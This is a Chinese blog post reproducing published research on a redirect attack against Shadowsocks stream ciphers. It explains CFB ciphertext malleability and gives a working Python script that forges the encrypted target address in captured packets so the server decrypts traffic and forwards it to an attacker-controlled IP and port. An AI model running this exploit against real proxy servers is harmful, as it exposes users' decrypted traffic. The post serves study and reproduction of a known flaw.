<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <meta name="google-site-verification" content="0SBmxtYod-jrbNf8wqYgt4FOLnHd27d6ccpyEyXMiEs">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"l3yx.github.io","root":"/","scheme":"Gemini","version":"7.7.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":-1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="Shadowsocks是一个基于SOCKS5的代理软件，其主要用途就不用解释了， 其协议存在漏洞，可以通过重定向攻击解密shadowsocks数据包密文。以下总结参考自Zhiniang Peng的研究成果">
<meta property="og:type" content="article">
<meta property="og:title" content="Shadowsocks协议重定向攻击">
<meta property="og:url" content="https://l3yx.github.io/2020/02/29/Shadowsocks%E5%8D%8F%E8%AE%AE%E9%87%8D%E5%AE%9A%E5%90%91%E6%94%BB%E5%87%BB/index.html">
<meta property="og:site_name" content="l3yx&#39;s blog">
<meta property="og:description" content="Shadowsocks是一个基于SOCKS5的代理软件，其主要用途就不用解释了， 其协议存在漏洞，可以通过重定向攻击解密shadowsocks数据包密文。以下总结参考自Zhiniang Peng的研究成果">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://l3yx.github.io/2020/02/29/Shadowsocks%E5%8D%8F%E8%AE%AE%E9%87%8D%E5%AE%9A%E5%90%91%E6%94%BB%E5%87%BB/image-20200227152619465.png">
<meta property="og:image" content="https://l3yx.github.io/2020/02/29/Shadowsocks%E5%8D%8F%E8%AE%AE%E9%87%8D%E5%AE%9A%E5%90%91%E6%94%BB%E5%87%BB/image-20200227162247002.png">
<meta property="og:image" content="https://l3yx.github.io/2020/02/29/Shadowsocks%E5%8D%8F%E8%AE%AE%E9%87%8D%E5%AE%9A%E5%90%91%E6%94%BB%E5%87%BB/image-20200227170902068.png">
<meta property="og:image" content="https://l3yx.github.io/2020/02/29/Shadowsocks%E5%8D%8F%E8%AE%AE%E9%87%8D%E5%AE%9A%E5%90%91%E6%94%BB%E5%87%BB/image-20200227174302999.png">
<meta property="og:image" content="https://l3yx.github.io/2020/02/29/Shadowsocks%E5%8D%8F%E8%AE%AE%E9%87%8D%E5%AE%9A%E5%90%91%E6%94%BB%E5%87%BB/image-20200227174500978.png">
<meta property="og:image" content="https://l3yx.github.io/2020/02/29/Shadowsocks%E5%8D%8F%E8%AE%AE%E9%87%8D%E5%AE%9A%E5%90%91%E6%94%BB%E5%87%BB/image-20200227174710233.png">
<meta property="og:image" content="https://l3yx.github.io/2020/02/29/Shadowsocks%E5%8D%8F%E8%AE%AE%E9%87%8D%E5%AE%9A%E5%90%91%E6%94%BB%E5%87%BB/image-20200227180856311.png">
<meta property="article:published_time" content="2020-02-29T05:07:01.000Z">
<meta property="article:modified_time" content="2020-02-29T13:42:48.000Z">
<meta property="article:author" content="淚笑">
<meta property="article:tag" content="Shadowsocks">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://l3yx.github.io/2020/02/29/Shadowsocks%E5%8D%8F%E8%AE%AE%E9%87%8D%E5%AE%9A%E5%90%91%E6%94%BB%E5%87%BB/image-20200227152619465.png">

<link rel="canonical" href="https://l3yx.github.io/2020/02/29/Shadowsocks%E5%8D%8F%E8%AE%AE%E9%87%8D%E5%AE%9A%E5%90%91%E6%94%BB%E5%87%BB/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true
  };
</script>

  <title>Shadowsocks协议重定向攻击 | l3yx's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="l3yx's blog" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">l3yx's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-right"></div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://l3yx.github.io/2020/02/29/Shadowsocks%E5%8D%8F%E8%AE%AE%E9%87%8D%E5%AE%9A%E5%90%91%E6%94%BB%E5%87%BB/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/Avatar.jpg">
      <meta itemprop="name" content="淚笑">
      <meta itemprop="description" content="不忘初心,方得始终">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="l3yx's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Shadowsocks协议重定向攻击
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2020-02-29 13:07:01 / 修改时间：21:42:48" itemprop="dateCreated datePublished" datetime="2020-02-29T13:07:01+08:00">2020-02-29</time>
            </span>

          
            <span id="/2020/02/29/Shadowsocks%E5%8D%8F%E8%AE%AE%E9%87%8D%E5%AE%9A%E5%90%91%E6%94%BB%E5%87%BB/" class="post-meta-item leancloud_visitors" data-flag-title="Shadowsocks协议重定向攻击" title="阅读次数">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span class="leancloud-visitors-count"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="fa fa-comment-o"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2020/02/29/Shadowsocks%E5%8D%8F%E8%AE%AE%E9%87%8D%E5%AE%9A%E5%90%91%E6%94%BB%E5%87%BB/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2020/02/29/Shadowsocks%E5%8D%8F%E8%AE%AE%E9%87%8D%E5%AE%9A%E5%90%91%E6%94%BB%E5%87%BB/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>Shadowsocks是一个基于SOCKS5的代理软件，其主要用途就不用解释了， 其协议存在漏洞，可以通过重定向攻击解密shadowsocks数据包密文。以下总结参考自<a href="https://github.com/edwardz246003/shadowsocks" target="_blank" rel="noopener">Zhiniang Peng</a>的研究成果</p>
<a id="more"></a>

<h2 id="Shadowsocks工作原理"><a href="#Shadowsocks工作原理" class="headerlink" title="Shadowsocks工作原理"></a>Shadowsocks工作原理</h2><p>sslocal运行于本地，并监听某端口（默认1080）提供代理服务，ssserver运行于远程服务器，并监听某端口（默认8388）接收来自sslocal的数据</p>
<p>浏览器设置代理，所有请求首先发给sslocal，sslocal将数据进行加密后发给ssserver，ssserver解密数据包，并转发浏览器的请求，然后将结果加密返回，sslocal解密并返回给浏览器</p>
<p>client &lt;—&gt; ss-local &lt;–[encrypted]–&gt; ss-remote &lt;—&gt; target</p>
<p><img src="/2020/02/29/Shadowsocks%E5%8D%8F%E8%AE%AE%E9%87%8D%E5%AE%9A%E5%90%91%E6%94%BB%E5%87%BB/image-20200227152619465.png" alt="image-20200227152619465"></p>
<p>可以通过pip安装python版Shadowsocks，在包存放路径下找到源码</p>
<p><code>python3 -m pip install shadowsocks</code></p>
<h3 id="请求流程"><a href="#请求流程" class="headerlink" title="请求流程"></a>请求流程</h3><p>sslocal通过发送以目标地址开头，后跟请求数据的包的密文来启动与ssserver的TCP连接</p>
<p><code>message=[target address][payload]</code></p>
<p><code>ciphertext=Stream_encrypt(key,IV,message)</code></p>
<p>最后发送的其实就是<code>随机生成的16字节的IV+ciphertext</code></p>
<p>ssserver接收数据并解密</p>
<p><code>message=Stream_decrypt(key,IV,ciphertext)</code>  </p>
<p>并解析出<code>[target address]</code>。 然后与<code>[target address]</code>建立新的TCP连接，并向目标转发请求。ssserver接收到来自<code>[target address]</code>的回复，进行加密并将其转发回sslocal，直到sslocal断开连接</p>
<p>sslocal收到的数据也是</p>
<p><code>随机生成的16字节的IV+response的密文</code></p>
<h3 id="Address-格式"><a href="#Address-格式" class="headerlink" title="Address 格式"></a>Address 格式</h3><p>第一个字节用以说明地址类型</p>
<ul>
<li><p>0x01：host是4字节的IPv4地址</p>
</li>
<li><p>0x03：host是可变长度的字符串，以1个字节开头作为长度，后跟最多255个字节的域名</p>
</li>
<li><p>0x04：host是一个16字节的IPv6地址</p>
</li>
</ul>
<p>端口号是一个2字节无符号整数</p>
<p><code>[1-byte type][variable-length host][2-byte port]</code></p>
<h2 id="AES-256-CFB"><a href="#AES-256-CFB" class="headerlink" title="AES-256-CFB"></a>AES-256-CFB</h2><p>以AES-256-CFB加密方式为例</p>
<p><img src="/2020/02/29/Shadowsocks%E5%8D%8F%E8%AE%AE%E9%87%8D%E5%AE%9A%E5%90%91%E6%94%BB%E5%87%BB/image-20200227162247002.png" alt="image-20200227162247002"></p>
<p>这种加密方式，明文和密文是等长的，解密过程如上。如果将密文的第一个块从c1修改为c1’，那么第一个明文块将从p1变为p1’，第二个分组的数据将会错误解密</p>
<p><img src="/2020/02/29/Shadowsocks%E5%8D%8F%E8%AE%AE%E9%87%8D%E5%AE%9A%E5%90%91%E6%94%BB%E5%87%BB/image-20200227170902068.png" alt="image-20200227170902068"></p>
<p>他们的关系如下</p>
<blockquote>
<p>c1’=xor(c1,r)<br>p1’=xor(p1,r)</p>
</blockquote>
<h2 id="请求重定向攻击"><a href="#请求重定向攻击" class="headerlink" title="请求重定向攻击"></a>请求重定向攻击</h2><p>再回顾一下sslocal发送给ssserver的数据</p>
<p><code>IV+encrypt([target address][payload])</code></p>
<p>其中<code>[payload]</code>是加密的无法得知，但如果能控制<code>[target address]</code>并将其改为自己可控的服务器端<code>[evil address]</code>再将修改后的包发送给ssserver，那么ssserver岂不是帮我们解密了<code>[payload]</code>并且将请求转发到了<code>[evil address]</code></p>
<p>假设使用的是IPv4地址，那么要构造一个<code>[target address]</code>，就需要控制p1’的前7个字节，需要控制p1’的前7个字节就需要知道p1的前7个字节</p>
<p>而HTTP的响应包前7个字节是固定的，即<code>HTTP/1.</code></p>
<h3 id="攻击演示"><a href="#攻击演示" class="headerlink" title="攻击演示"></a>攻击演示</h3><p>服务端运行ssserver</p>
<p><img src="/2020/02/29/Shadowsocks%E5%8D%8F%E8%AE%AE%E9%87%8D%E5%AE%9A%E5%90%91%E6%94%BB%E5%87%BB/image-20200227174302999.png" alt="image-20200227174302999"></p>
<p>客户端我用python版的时候有点小问题，所以就直接用这个了</p>
<p><img src="/2020/02/29/Shadowsocks%E5%8D%8F%E8%AE%AE%E9%87%8D%E5%AE%9A%E5%90%91%E6%94%BB%E5%87%BB/image-20200227174500978.png" alt="image-20200227174500978"></p>
<p>用wireshark开始抓包，并使用curl通过代理请求百度，保存抓包结果p.pcapng</p>
<p><img src="/2020/02/29/Shadowsocks%E5%8D%8F%E8%AE%AE%E9%87%8D%E5%AE%9A%E5%90%91%E6%94%BB%E5%87%BB/image-20200227174710233.png" alt="image-20200227174710233"></p>
<p>攻击代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> scapy.all <span class="keyword">import</span> rdpcap</span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line">packets = rdpcap(<span class="string">"p.pcapng"</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#ssserver的ip和端口，用以筛选数据包和发送修改后的数据包</span></span><br><span class="line">sport=<span class="number">8388</span></span><br><span class="line">src=<span class="string">"xx.xx.xx.xx"</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#要转发的目标地址，用以接收解密后的数据</span></span><br><span class="line">target_ip = <span class="string">"xx.xx.xx.xx"</span></span><br><span class="line">target_port = <span class="number">6666</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> packet <span class="keyword">in</span> packets:</span><br><span class="line">    <span class="keyword">if</span> <span class="string">"TCP"</span> <span class="keyword">in</span> packet <span class="keyword">and</span> packet[<span class="string">'TCP'</span>].payload:</span><br><span class="line">        <span class="comment">#筛选一下数据包，需要ssserver返回给sslocal的数据包</span></span><br><span class="line">        <span class="keyword">if</span> packet[<span class="string">"IP"</span>].src==src <span class="keyword">and</span> packet[<span class="string">"TCP"</span>].sport==sport <span class="keyword">and</span> len(packet[<span class="string">'TCP'</span>].payload.load)&gt;<span class="number">16</span>:</span><br><span class="line">            <span class="comment">#分隔出16字节的随机IV和数据密文</span></span><br><span class="line">            recv_iv, recv_data=packet[<span class="string">'TCP'</span>].payload.load[:<span class="number">16</span>],packet[<span class="string">'TCP'</span>].payload.load[<span class="number">16</span>:]</span><br><span class="line">            <span class="comment">#HTTP响应包的前7位固定是HTTP/1.</span></span><br><span class="line">            predict_data = <span class="string">b"HTTP/1."</span></span><br><span class="line">            <span class="comment">#在关系式 c1'=xor(c1,r) p1'=xor(p1,r) 中，predict_xor_key相当于计算r</span></span><br><span class="line">            predict_xor_key = bytes([(predict_data[i] ^ recv_data[i]) <span class="keyword">for</span> i <span class="keyword">in</span> range(len(predict_data))])</span><br><span class="line">            <span class="comment">#构造[evil address]</span></span><br><span class="line">            fake_header = <span class="string">b'\x01'</span> + socket.inet_pton(socket.AF_INET, target_ip) + bytes(struct.pack(<span class="string">'&gt;H'</span>, target_port))</span><br><span class="line">            <span class="comment">#计算[evil address]的密文</span></span><br><span class="line">            fake_header = bytes([(fake_header[i] ^ predict_xor_key[i]) <span class="keyword">for</span> i <span class="keyword">in</span> range(len(fake_header))])</span><br><span class="line">            <span class="comment">#拼接修改后的数据</span></span><br><span class="line">            fake_data = recv_iv + fake_header + recv_data[len(fake_header):]</span><br><span class="line">            print(fake_data.hex())</span><br><span class="line">            s = socket.socket()</span><br><span class="line">            <span class="comment">#将修改后的数据发送给ssserver</span></span><br><span class="line">            s.connect((src, sport))</span><br><span class="line">            s.send(fake_data)</span><br><span class="line">            print(<span class="string">'Tcp sending... '</span>)</span><br><span class="line">            time.sleep(<span class="number">3</span>)</span><br><span class="line">            s.close()</span><br></pre></td></tr></table></figure>

<p>在target_ip监听相应端口即可收到解密后的HTTP响应包</p>
<p><img src="/2020/02/29/Shadowsocks%E5%8D%8F%E8%AE%AE%E9%87%8D%E5%AE%9A%E5%90%91%E6%94%BB%E5%87%BB/image-20200227180856311.png" alt="image-20200227180856311"></p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a href="https://github.com/edwardz246003/shadowsocks" target="_blank" rel="noopener">Redirect attack on Shadowsocks stream ciphers</a></p>
<p><a href="https://www.ioiogoo.cn/2016/12/22/shadowsocks%E6%BA%90%E7%A0%81%E8%A7%A3%E8%AF%BB%EF%BC%88%E4%B8%80%EF%BC%89%EF%BC%9A%E5%9F%BA%E6%9C%AC%E6%B5%81%E7%A8%8B/" target="_blank" rel="noopener">shadowsocks源码解读（一）：基本流程</a></p>
<p><a href="https://www.leadroyal.cn/?p=1036" target="_blank" rel="noopener">ss协议漏洞的复现和利用</a></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Shadowsocks/" rel="tag"># Shadowsocks</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/02/25/FastJson-1-2-24-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="prev" title="FastJson 1.2.24 反序列化">
      <i class="fa fa-chevron-left"></i> FastJson 1.2.24 反序列化
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/03/21/Shiro-1-2-4-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/" rel="next" title="Shiro 1.2.4 反序列化漏洞">
      Shiro 1.2.4 反序列化漏洞 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Shadowsocks工作原理"><span class="nav-number">1.</span> <span class="nav-text">Shadowsocks工作原理</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#请求流程"><span class="nav-number">1.1.</span> <span class="nav-text">请求流程</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Address-格式"><span class="nav-number">1.2.</span> <span class="nav-text">Address 格式</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#AES-256-CFB"><span class="nav-number">2.</span> <span class="nav-text">AES-256-CFB</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#请求重定向攻击"><span class="nav-number">3.</span> <span class="nav-text">请求重定向攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#攻击演示"><span class="nav-number">3.1.</span> <span class="nav-text">攻击演示</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考"><span class="nav-number">4.</span> <span class="nav-text">参考</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="淚笑"
      src="/images/Avatar.jpg">
  <p class="site-author-name" itemprop="name">淚笑</p>
  <div class="site-description" itemprop="description">不忘初心,方得始终</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">33</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">33</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/l3yx" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;l3yx" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:1729888211@qq.com" title="E-Mail → mailto:1729888211@qq.com" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="tencent://message/?uin=1729888211" title="QQ → tencent:&#x2F;&#x2F;message&#x2F;?uin&#x3D;1729888211" rel="noopener" target="_blank"><i class="fa fa-fw fa-qq"></i>QQ</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://twitter.com/l3yx_" title="Twitter → https:&#x2F;&#x2F;twitter.com&#x2F;l3yx_" rel="noopener" target="_blank"><i class="fa fa-fw fa-twitter"></i>Twitter</a>
      </span>
      <span class="links-of-author-item">
        <a href="/atom.xml" title="RSS → &#x2F;atom.xml"><i class="fa fa-fw fa-rss"></i>RSS</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">淚笑</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v4.2.1
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">主题 – <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> v7.7.1
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('https://cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : true,
      notify     : false,
      appId      : 'qwTJhbxxQO8aSbrgx4Bv1MuN-gzGzoHsz',
      appKey     : '3xcdH0gTNuTi8B0JqFAFD9SD',
      placeholder: "Just go go",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : true,
      lang       : 'zh-cn' || 'zh-cn',
      path       : location.pathname,
      recordIP   : true,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>


  <!-- music -->
    <!-- require APlayer -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.css">
    <script src="https://cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.js"></script>
    <!-- require MetingJS -->
    <script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    <div style="opacity:0.7">
        <meting-js
            server="netease"
            type="playlist"
            id="2486559481"
            fixed="true"
            volume="0.5"
            order="random"
            >
        </meting-js>
    </div>

    <script>
        ap = null
        Object.defineProperty(document.getElementById('2486559481'),"aplayer",{
            set: function(aplayer) {
                ap=aplayer
                ready();
            }
        });
        
        isRecover = false;
        function ready(){
            ap.on('canplay', function () {
                if(!isRecover){
                    if(localStorage.getItem("musicIndex") != null){
                        musicIndex = localStorage.getItem("musicIndex");
                        musicTime = localStorage.getItem("musicTime");
                    if(ap.list.index != musicIndex){
                        ap.list.switch(musicIndex);
                    }else{
                        ap.seek(musicTime);
                        ap.play();
                        localStorage.clear();
                        isRecover = true;
                    }
                    }else{
                        isRecover = true;
                    }
                }
            });
        }

        window.onbeforeunload = function(event) {
            if(!ap.audio.paused){
				ap.pause();
                musicIndex = ap.list.index;
                musicTime = ap.audio.currentTime;
                localStorage.setItem("musicIndex",musicIndex);
                localStorage.setItem("musicTime",musicTime);
            }
        };
    </script>
  <!-- music -->

</body>
</html>
